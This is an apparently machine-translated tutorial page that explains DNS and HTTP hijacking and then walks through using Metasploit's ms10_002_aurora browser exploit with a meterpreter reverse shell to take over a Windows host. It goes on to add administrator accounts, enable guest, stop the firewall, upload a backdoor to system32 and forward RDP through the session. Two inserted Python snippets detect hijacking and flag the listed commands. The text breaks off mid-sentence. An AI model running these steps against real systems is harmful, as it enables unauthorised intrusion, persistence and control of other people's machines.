
DNS hijacking of kali

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

DNS hijacking: the DNS servers that users rely on to browse the Internet are assigned by the operator, so the operator can do whatever it wants at this node.

For example, when a user visits a website and enters its domain name, a normal DNS server returns the IP of that domain. After DNS hijacking, the server returns the IP of an intermediary server instead. That intermediary server always answers with a 302, which makes the user's browser jump to a prepared web page carrying ads; that page then opens the address the user originally wanted in an iframe.

HTTP hijacking:

Protocol detection is set up on the operator's router node. Once a request is identified as an HTTP request for an HTML resource, it is intercepted and processed. The follow-up usually takes one of two forms: one is, as with DNS hijacking, to return a 302 so that the user's browser jumps to another address; the other is to insert JS or DOM-node ads into the HTML data returned by the server.
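The two hijacking patterns described above (a 302 to an intermediary page that frames the original site, and script or DOM nodes inserted into the returned HTML) can be recognised from the client side. The following is an added example, not part of the original article; the host names, the sample responses and the idea of comparing against a baseline copy fetched over a trusted path are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

class _SrcCollector(HTMLParser):
    """Collect (tag, src) for every <script src> and <iframe src> in a page."""
    def __init__(self):
        super().__init__()
        self.found = []
    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag in ("script", "iframe") and src:
            self.found.append((tag, src))

def external_refs(html):
    parser = _SrcCollector()
    parser.feed(html)
    return parser.found

def classify(requested_url, responses, baseline_html):
    """responses: (status, location, body) tuples in the order received.
    baseline_html: the same page fetched over a path trusted to be unmodified."""
    want = urlsplit(requested_url).hostname
    status, location, body = responses[0]
    # Pattern 1: the first answer is a 302 to another host, and the page that
    # finally loads opens the originally requested site inside an iframe.
    if status == 302 and location and urlsplit(location).hostname != want:
        framed = [src for tag, src in external_refs(responses[-1][2])
                  if tag == "iframe" and urlsplit(src).hostname == want]
        # A cross-host 302 without the iframe can be legitimate: review it.
        return "redirect_then_iframe" if framed else "unexpected_redirect"
    # Pattern 2: script/iframe sources that the baseline copy does not contain.
    # Inline scripts (no src attribute) are outside what this check sees.
    extra = set(external_refs(body)) - set(external_refs(baseline_html))
    return "injected_nodes" if extra else "clean"

# Constructed sample data (reserved example domains), not captured traffic.
URL = "http://www.example.com/"
BASELINE = '<html><script src="/app.js"></script><p>news</p></html>'
HIJACKED_302 = [
    (302, "http://portal.example.net/?u=http://www.example.com/", ""),
    (200, None, '<html><div>ad</div>'
                '<iframe src="http://www.example.com/"></iframe></html>'),
]
INJECTED = [(200, None, '<html><script src="/app.js"></script>'
             '<script src="http://ads.example.net/a.js"></script><p>news</p></html>')]
CLEAN = [(200, None, BASELINE)]

if __name__ == "__main__":
    for name, resp in (("302", HIJACKED_302), ("inject", INJECTED), ("clean", CLEAN)):
        print(name, classify(URL, resp, BASELINE))
```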

Ensure network connectivity and configure network address

Before using msfconsole for the first time, start the built-in PostgreSQL database and the metasploit service

Enable PostgreSQL: service postgresql start

Enable metasploit: service metasploit start

root@kali:~# ss -lnt | grep 5432 (make sure that the postgresql service is running; it listens on port 5432 by default)

root@kali:~# msfconsole

Find the 10-002 vulnerability module: search 10-002

Select the module: use exploit/windows/browser/ms10_002_aurora

set payload windows/meterpreter/reverse_tcp (defines the payload)

set lhost 192.168.48.123 (defines the local address)

set URIPATH / (defines the suffix of the URL; I only set a single / here)

exploit (runs the module)

Open the URL http://192.168.48.123:8080/ on the target host

sessions -i 1 (opens a connection to session 1)

sessions lists the sessions that have been successfully obtained; sessions -i connects to the meterpreter session with the given serial number so that you can continue working in it

Get a remote command line on the target host through shell

Create accounts and passwords through DOS

Common Windows commands

1. net localgroup administrators username /add (add the user to the administrators group to give it administrative privileges)

2. net user guest /active:yes (activate the guest user)

3. net user guest 12345 (change the guest password to 12345)

4. net user (view account attributes)

5. net start (check which services are enabled)

6. net time \\target-ip (check the time of the other party)

7. net view (check which shares are enabled in the local area network)

8. net share (view the shares enabled locally)

9. net share C$ /del (delete the default share of disk C)

10. copy xx.exe \\ip\admin$\System32 (copy the current xx.exe to the System32 directory of the other party's Admin$ share)

11. sc config tlntsvr start= auto (change the startup mode of the telnet service to automatic; note the space in front of auto)

12. net stop sharedaccess (turn off the firewall that comes with the system)

13. net send IP message (send a message to the target IP using the messenger service)

14. tasklist (view processes)

15. taskkill (terminate a process); ntsd forcibly terminates a process

16. services.msc (open the services of the local computer)

17. net use \\ip\ipc$ "" /user:"" (create an empty IPC connection)

18. net use \\ip\ipc$ "password" /user:"user name" (establish a non-empty IPC connection; non-empty means an account and password are required)

19. net use \\ip\ipc$ /del (delete the empty IPC connection)

20. net use z: \\127.0.0.1\c$ (map disk C of the target host to local disk Z)
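Several of the commands listed above (adding a user to the administrators group, activating guest, stopping sharedaccess, setting the telnet service to auto-start, connecting to ipc$/admin$/c$) leave a recognisable command line in process-creation logs. The following detection sketch is an added example, not part of the original article; the rule names, the event tuple layout and the choice of iexplore.exe as the browser ancestor (taken from the browser module used earlier on this page) are assumptions.

```python
import re

# Patterns for the riskier commands in the list above, matched against process
# command lines as recorded by process-creation logging. Rule names are made up.
RULES = {
    "admin_group_add":  r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b",
    "guest_enabled":    r"\bnet1?(\.exe)?\s+user\s+guest\s+/active:yes\b",
    "firewall_stopped": r"\bnet1?(\.exe)?\s+stop\s+sharedaccess\b",
    "telnet_autostart": r"\bsc(\.exe)?\s+config\s+tlntsvr\s+start=\s*auto\b",
    "admin_share_use":  r"\bnet1?(\.exe)?\s+use\s+(\w:\s+)?\\\\[^\\\s]+\\(ipc|admin|c)\$",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

def match_rules(command_line):
    """Return the names of all rules the command line triggers."""
    return [name for name, rx in COMPILED.items() if rx.search(command_line)]

def triage(events):
    """events: (host, ancestor process names, command line) tuples.
    A hit whose ancestry includes a browser is rated high, since a browser
    should not be spawning account or service changes."""
    alerts = []
    for host, ancestors, cmd in events:
        hits = match_rules(cmd)
        if hits:
            browser = any(a.lower() == "iexplore.exe" for a in ancestors)
            alerts.append((host, hits, "high" if browser else "medium"))
    return alerts

# Constructed sample events, not taken from a real host.
SAMPLE_EVENTS = [
    ("WS01", ["explorer.exe", "cmd.exe"], "net user"),
    ("WS01", ["explorer.exe", "cmd.exe"], "net localgroup administrators"),
    ("WS02", ["iexplore.exe", "cmd.exe"], "net user guest /active:yes"),
    ("WS02", ["iexplore.exe", "cmd.exe"], "net localgroup administrators guest /add"),
    ("WS02", ["iexplore.exe", "cmd.exe"], "net stop sharedaccess"),
    ("WS03", ["services.exe", "cmd.exe"], "sc config tlntsvr start= auto"),
    ("WS03", ["explorer.exe", "cmd.exe"], r'net use \\192.168.48.100\ipc$ "" /user:""'),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The two plain listing commands (net user, net localgroup administrators) raise no alert; only the state-changing forms do.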

Connect to the system remotely

rdesktop -u administrator -p 123 192.168.48.100:3389

getuid shows the user of the process that meterpreter is injected into on the target host

The upload command uploads files to the target host, for example transferring the backdoor program setup.exe to the system32 directory of the target host

upload setup.exe C:\\windows\\system32\\

portfwd: port forwarding

For example, 3389 is enabled on the target host, but access is allowed only from specific IPs, so the * host cannot connect. You can use the portfwd command to forward port 3389 of the target host to another port.

For example: portfwd add -l 1122 -p 3389 -r 192.168.48.100

This forwards port 3389 of the target host 192.168.48.100 to port 1122

You only need to connect to port 1122 of the target to open the remote desktop.

rdesktop -u administrator -p 123456 192.168.48.100:1122

sysinfo shows the system information of the target host

ps shows the process information running on the target host, using the
